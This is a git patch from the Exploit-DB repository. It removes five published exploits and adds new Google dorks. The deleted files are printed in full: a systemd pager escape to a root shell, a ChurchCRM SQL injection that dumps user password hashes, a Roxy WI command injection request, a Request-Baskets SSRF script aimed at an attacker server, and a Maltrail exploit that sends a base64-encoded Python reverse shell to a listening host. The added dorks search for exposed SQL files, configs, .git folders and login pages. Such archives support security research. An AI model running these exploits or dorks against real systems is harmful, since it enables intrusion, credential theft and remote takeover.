From 75cbb282d962e26488371db72a023a321593a5cf Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Tue, 31 Oct 2023 00:17:05 +0000 Subject: [PATCH] DB: 2023-10-31 12 changes to exploits/shellcodes/ghdb systemd 246 - Local Privilege Escalation ChurchCRM v4.5.3 - Authenticated SQL Injection Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) Request-Baskets v1.2.1 - Server-side request forgery (SSRF) --- exploits/linux/local/51674.txt | 17 ---- exploits/php/webapps/51397.txt | 30 ------- exploits/php/webapps/51481.txt | 24 ----- exploits/python/webapps/51675.sh | 53 ----------- exploits/python/webapps/51676.py | 33 ------- files_exploits.csv | 5 -- ghdb.xml | 150 +++++++++++++++++++++++++++++++ 7 files changed, 150 insertions(+), 162 deletions(-) delete mode 100644 exploits/linux/local/51674.txt delete mode 100644 exploits/php/webapps/51397.txt delete mode 100644 exploits/php/webapps/51481.txt delete mode 100755 exploits/python/webapps/51675.sh delete mode 100755 exploits/python/webapps/51676.py diff --git a/exploits/linux/local/51674.txt b/exploits/linux/local/51674.txt deleted file mode 100644 index e13f70eee..000000000 --- a/exploits/linux/local/51674.txt +++ /dev/null @@ -1,17 +0,0 @@ -# Exploit Title: systemd 246 - Local Privilege Escalation -# Exploit Author: Iyaad Luqman K (init_6) -# Application: systemd 246 -# Tested on: Ubuntu 22.04 -# CVE: CVE-2023-26604 - -systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. -This vulnerability allows a local attacker to gain root privileges. - -## Proof Of Concept: -1. Run the systemctl command which can be run as root user. - -sudo /usr/bin/systemctl status any_service - -2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands. - -3. Type in `!/bin/sh` in the pager to spawn a shell as root user. \ No newline at end of file diff --git a/exploits/php/webapps/51397.txt b/exploits/php/webapps/51397.txt deleted file mode 100644 index 851263e92..000000000 --- a/exploits/php/webapps/51397.txt +++ /dev/null @@ -1,30 +0,0 @@ -# Exploit Title: ChurchCRM 4.5.3 - Authenticated SQL Injection -# Date: 27-04-2023 -# Exploit Author: Iyaad Luqman K -# Software Link: https://github.com/ChurchCRM/CRM/releases -# Vendor Homepage: http://churchcrm.io/ -# Tested Version: 4.5.1 -# Tested on: Windows, Linux -# CVE: CVE-2023-24685 - - -ChurchCRM v4.5.3 and below was discovered to contain a SQL injection vulnerability via the Event parameter -under the Event Attendance reports module. - -- After Logging in, go to -``` -GET /EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School HTTP/1.1 -Host: localhost -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Accept-Encoding: gzip, deflate -Accept-Language: en-US,en;q=0.9 -Cookie: CRM-7bf048c51cd7d0923f0ab3e959c3d3f6=d99fjb19f2kp081ol95remfm6d -Connection: close - -``` -- The response will dump the `usr_Username` and `usr_Password` from the database. -``` -PerseveranceAdmin:261f4aef6877ce6c11a780ae6c13e4e2f27a8a55f69d6d6785fc787063272db4 -``` \ No newline at end of file diff --git a/exploits/php/webapps/51481.txt b/exploits/php/webapps/51481.txt deleted file mode 100644 index 25c7722bd..000000000 --- a/exploits/php/webapps/51481.txt +++ /dev/null @@ -1,24 +0,0 @@ -# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute -# Exploit Author: Iyaad Luqman K -# Application: Roxy WI <= v6.1.0.0 -# Vendor Homepage: https://roxy-wi.org -# Software Link: https://github.com/hap-wi/roxy-wi.git -# Tested on: Ubuntu 22.04 -# CVE : CVE-2022-31137 - - -# PoC -POST /app/options.py HTTP/1.1 -Host: 192.168.1.44 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 -Accept: */* -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Content-Type: application/x-www-form-urlencoded; charset=UTF-8 -X-Requested-With: XMLHttpRequest -Content-Length: 136 -Origin: https://192.168.1.44 -Referer: https://192.168.1.44/app/login.py -Connection: close - -show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1 \ No newline at end of file diff --git a/exploits/python/webapps/51675.sh b/exploits/python/webapps/51675.sh deleted file mode 100755 index 91a00fa2d..000000000 --- a/exploits/python/webapps/51675.sh +++ /dev/null @@ -1,53 +0,0 @@ -# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF) -# Exploit Author: Iyaad Luqman K (init_6) -# Application: Request-Baskets v1.2.1 -# Tested on: Ubuntu 22.04 -# CVE: CVE-2023-27163 - - -# PoC -#!/bin/bash - - -if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then - help="Usage: exploit.sh \n\n"; - help+="Arguments:\n" \ - help+=" URL main path (/) of the server (eg. http://127.0.0.1:5000/)\n"; - help+=" TARGET"; - - echo -e "$help"; - exit 1; -fi - -URL=$1 -ATTACKER_SERVER=$2 - -if [ "${URL: -1}" != "/" ]; then - URL="$URL/"; -fi; - -BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' Creating the \"$BASKET_NAME\" proxy basket..."; - -if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then - echo "> FATAL: Could not properly request $API_URL. Is the server online?"; - exit 1; -fi; - -BASKET_URL="$URL$BASKET_NAME"; - -echo "> Basket created!"; -echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER."; - -if ! jq --help 1>/dev/null; then - echo "> Response body (Authorization): $response"; -else - echo "> Authorization: $(echo "$response" | jq -r ".token")"; -fi; - -exit 0; \ No newline at end of file diff --git a/exploits/python/webapps/51676.py b/exploits/python/webapps/51676.py deleted file mode 100755 index bf0a17b8b..000000000 --- a/exploits/python/webapps/51676.py +++ /dev/null @@ -1,33 +0,0 @@ -# Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) -# Exploit Author: Iyaad Luqman K (init_6) -# Application: Maltrail v0.53 -# Tested on: Ubuntu 22.04 - -# PoC -import sys; -import os; -import base64; - -def main(): - listening_IP = None - listening_PORT = None - target_URL = None - - if len(sys.argv) != 4: - print("Error. Needs listening IP, PORT and target URL.") - return(-1) - - listening_IP = sys.argv[1] - listening_PORT = sys.argv[2] - target_URL = sys.argv[3] + "/login" - print("Running exploit on " + str(target_URL)) - curl_cmd(listening_IP, listening_PORT, target_URL) - -def curl_cmd(my_ip, my_port, target_url): - payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'' - encoded_payload = base64.b64encode(payload.encode()).decode() # encode the payload in Base64 - command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'" - os.system(command) - -if __name__ == "__main__": - main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 45c57e219..6a1abca69 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -7746,7 +7746,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,,2018-01-31,2018-01-31,0,CVE-2017-18078,,,,,http://seclists.org/oss-sec/2018/q1/115 45715,exploits/linux/local/45715.txt,"systemd - 'chown_one()' Dereference Symlinks",2018-10-29,"Google Security Research",local,linux,,2018-10-29,2018-11-17,1,CVE-2018-15687,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1689 41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation",2017-01-24,"Sebastian Krahmer",local,linux,,2017-01-26,2019-03-07,0,CVE-2016-10156,,,,,http://www.openwall.com/lists/oss-security/2017/01/24/4 -51674,exploits/linux/local/51674.txt,"systemd 246 - Local Privilege Escalation",2023-08-10,"Iyaad Luqman K",local,linux,,2023-08-10,2023-08-10,1,CVE-2023-26604,,,,, 15620,exploits/linux/local/15620.sh,"SystemTap - Local Privilege Escalation",2010-11-26,"Tavis Ormandy",local,linux,,2010-11-26,2010-11-26,1,CVE-2010-4170;OSVDB-69489,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-26-at-62953-am.png,, 33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",local,linux,,2010-02-05,2014-06-01,1,CVE-2010-0411;OSVDB-62131,,,,,https://www.securityfocus.com/bid/38120/info 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb @@ -15597,7 +15596,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,, 50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,, 51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,, -51397,exploits/php/webapps/51397.txt,"ChurchCRM v4.5.3 - Authenticated SQL Injection",2023-04-27,"Iyaad Luqman K",webapps,php,,2023-04-27,2023-05-07,1,CVE-2023-24685,,,,, 51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,, 51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,, 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip, @@ -28874,7 +28872,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.4-php.zip, 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80,2019-01-16,2019-01-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip, 46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80,2019-01-07,2019-01-07,0,CVE-2018-20526;CVE-2018-20525,Traversal,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip, -51481,exploits/php/webapps/51481.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute",2023-05-24,"Iyaad Luqman K",webapps,php,,2023-05-24,2023-05-24,1,CVE-2022-31137,,,,, 50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",2022-05-12,"Eren Gozaydin",webapps,php,,2022-05-12,2022-05-12,0,CVE-2022-28080,,,,, 6589,exploits/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' SQL Injection",2008-09-26,0x90,webapps,php,,2008-09-25,2016-12-23,1,OSVDB-49317;CVE-2008-4736,,,,, 6591,exploits/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,webapps,php,,2008-09-26,,1,OSVDB-57330;CVE-2008-7028,,,,, @@ -34709,7 +34706,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,, 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz, 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,, -51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-09-08,1,,,,,, 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz, 51276,exploits/python/webapps/51276.go,"modoboa 2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,, @@ -34720,7 +34716,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,, 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info 51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,, -51675,exploits/python/webapps/51675.sh,"Request-Baskets v1.2.1 - Server-side request forgery (SSRF)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,, 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,, 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,, 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,, diff --git a/ghdb.xml b/ghdb.xml index 8a5b4268f..1fa79d5d6 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -32856,6 +32856,21 @@ Discovered by Rootkit Pentester. 2015-12-21 anonymous + + 8287 + https://www.exploit-db.com/ghdb/8287 + Files Containing Juicy Info + "structure" + ext:sql + # Google Dork: "structure" + ext:sql +# Files Containing Juicy Info +# Date: 30/10/2023 +# Exploit chum1ng0 + "structure" + ext:sql + https://www.google.com/search?q="structure" + ext:sql + + 2023-10-30 + chum1ng0 + 140 https://www.exploit-db.com/ghdb/140 @@ -42212,6 +42227,21 @@ An attacker can further misuse this to conduct attacks. 2020-05-04 Tushar Kurunkar + + 8289 + https://www.exploit-db.com/ghdb/8289 + Files Containing Juicy Info + intitle:"index of" "/config/prod/" + # Google Dork: intitle:"index of" "/config/prod/" +# Files Containing Juicy Info +# Date: 30/10/2023 +# Exploit Suprit Pandurangi + intitle:"index of" "/config/prod/" + https://www.google.com/search?q=intitle:"index of" "/config/prod/" + + 2023-10-30 + Suprit Pandurangi + 5957 https://www.exploit-db.com/ghdb/5957 @@ -49318,6 +49348,21 @@ code. *Dork discovered by:* Sachin Wagh (@tiger_tigerboy) 2018-02-05 Sachin Wagh + + 8280 + https://www.exploit-db.com/ghdb/8280 + Files Containing Juicy Info + intitle:index.of login.js + # Google Dork: intitle:index.of login.js +# Files Containing Juicy Info +# Date: 30/10/2023 +# Exploit Varad Vaidya + intitle:index.of login.js + https://www.google.com/search?q=intitle:index.of login.js + + 2023-10-30 + Varad Vaidya + 7332 https://www.exploit-db.com/ghdb/7332 @@ -49532,6 +49577,21 @@ Author: Lord.TMR 2021-11-08 Vivek Pancholi + + 8284 + https://www.exploit-db.com/ghdb/8284 + Files Containing Juicy Info + inurl: .git + # Google Dork: inurl: .git +# Files Containing Juicy Info +# Date: 30/10/2023 +# Exploit Jai kumar + New submission + https://www.google.com/search?q=New submission + + 2023-10-30 + Jai kumar + 7349 https://www.exploit-db.com/ghdb/7349 @@ -55745,6 +55805,21 @@ Reza Abasi(Turku) 2022-06-22 Simone Gasparato + + 8281 + https://www.exploit-db.com/ghdb/8281 + Files Containing Juicy Info + site:.com intitle:"index of" /mobikwike + # Google Dork: site:.com intitle:"index of" /mobikwike +# Files Containing Juicy Info +# Date: 30/10/2023 +# Exploit Husain Ahmad + site:.com intitle:"index of" /mobikwike + https://www.google.com/search?q=site:.com intitle:"index of" /mobikwike + + 2023-10-30 + Husain Ahmad + 7942 https://www.exploit-db.com/ghdb/7942 @@ -55775,6 +55850,36 @@ Reza Abasi(Turku) 2022-06-20 Chirag Lundwani + + 8286 + https://www.exploit-db.com/ghdb/8286 + Files Containing Juicy Info + site:.com intitle:"index of"/csb + # Google Dork: site:.com intitle:"index of"/csb +# Files Containing Juicy Info +# Date: 30/10/2023 +# Exploit Husain Ahmad + site:.com intitle:"index of"/csb + https://www.google.com/search?q=site:.com intitle:"index of"/csb + + 2023-10-30 + Husain Ahmad + + + 8285 + https://www.exploit-db.com/ghdb/8285 + Files Containing Juicy Info + site:.com intitle:"index of"/sbi + # Google Dork: site:.com intitle:"index of"/sbi +# Files Containing Juicy Info +# Date: 30/10/2023 +# Exploit Husain Ahmad + site:.com intitle:"index of"/sbi + https://www.google.com/search?q=site:.com intitle:"index of"/sbi + + 2023-10-30 + Husain Ahmad + 8116 https://www.exploit-db.com/ghdb/8116 @@ -55790,6 +55895,21 @@ Reza Abasi(Turku) 2023-03-16 PRINCY M JOSE + + 8282 + https://www.exploit-db.com/ghdb/8282 + Files Containing Juicy Info + site:.com inurl:/pass-aspx. + # Google Dork: site:.com inurl:/pass-aspx. +# Files Containing Juicy Info +# Date: 30/10/2023 +# Exploit swara kalsekar + Submiting a google dork. + https://www.google.com/search?q=Submiting a google dork. + + 2023-10-30 + swara kalsekar + 8258 https://www.exploit-db.com/ghdb/8258 @@ -80463,6 +80583,21 @@ inurl:"/libs/granite/core/content/login.html" 2023-06-02 Sachin Gupta + + 8283 + https://www.exploit-db.com/ghdb/8283 + Pages Containing Login Portals + inurl:"/login.aspx" intitle:"pass". + # Google Dork: inurl:"/login.aspx" intitle:"pass". +# Pages Containing Login Portals +# Date: 30/10/2023 +# Exploit swara kalsekar + Submitting a google dork. + https://www.google.com/search?q=Submitting a google dork. + + 2023-10-30 + swara kalsekar + 8208 https://www.exploit-db.com/ghdb/8208 @@ -91682,6 +91817,21 @@ site:".atlassian.net" / "service desk/customer/user/login"2020-04-21 Juveria Banu + + 8288 + https://www.exploit-db.com/ghdb/8288 + Pages Containing Login Portals + site:..us inurl:"login.php" + # Google Dork: site:..us inurl:"login.php" +# Pages Containing Login Portals +# Date: 30/10/2023 +# Exploit Husain Ahmad + site:..us inurl:"login.php" + https://www.google.com/search?q=site:..us inurl:"login.php" + + 2023-10-30 + Husain Ahmad + 7501 https://www.exploit-db.com/ghdb/7501